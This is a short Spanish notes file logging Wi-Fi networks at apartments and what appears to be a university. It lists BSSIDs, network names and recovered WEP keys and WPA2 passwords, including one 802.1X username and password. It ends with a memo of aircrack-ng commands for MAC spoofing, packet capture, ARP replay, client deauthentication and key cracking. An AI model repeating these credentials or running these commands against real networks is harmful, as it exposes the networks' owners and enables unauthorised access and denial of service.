Ubicación	BSSID			ESSID		AUTH TYPE	AUTH DATA 1	| AUTH DATA 2
====================================================================================================
Dpto Nati	1C:AF:F7:17:10:04	Nicolas Nesci	WEP		hex: 4E8EC6203D
Dpto Nati	00:02:CF:A2:A8:F6	rafewifi	WEP		hex: 706564726F	| ascii: pedro
Dpto Nati				Nati		WPA2		pwd: tele-2781833
UP		00:1D:7E:DC:25:D0	UP-PVIII-I	WPA2+802.1X	usr: hbarre2	| pwd: NLX487
Dpto Hugo	E0:CB:4E:6D:9C:89	Fibertel WiFi	WEP		ascii: 4206536579000
Dpto Hugo				Lu		WEP		hex: 486F726F31 | ascii: Horo1

Redes que filtran por MAC:
================================================================================
Red		MAC
gmb		00:1F:E2:A2:C5:4F

#Usefull memos from man pages:
 * Change MAC
    o ifconfig wlan0 hw ether 00:00:00:00:00:00
 * Lista de WLANs
    o airodump-ng wlan0
 * Dumpear datos
    o airodump-ng -c <canal> -w <filename> --bssid <bssid> wlan0
    o <data hasta aprox 15k>
 * acelerar data:
    o aireplay-ng -3 -b <bssid> -h <miMAC> wlan0
    o aireplay-ng -1 0 -a <bssid> -h <miMAC> -e <wlanName> wlan0
 * disconnect client
    o aireplay-ng -0 0 -a <bssid> -c <clientMac> mon0
 * Buscar Clave:
    o aircrack-ng <filename>.cap
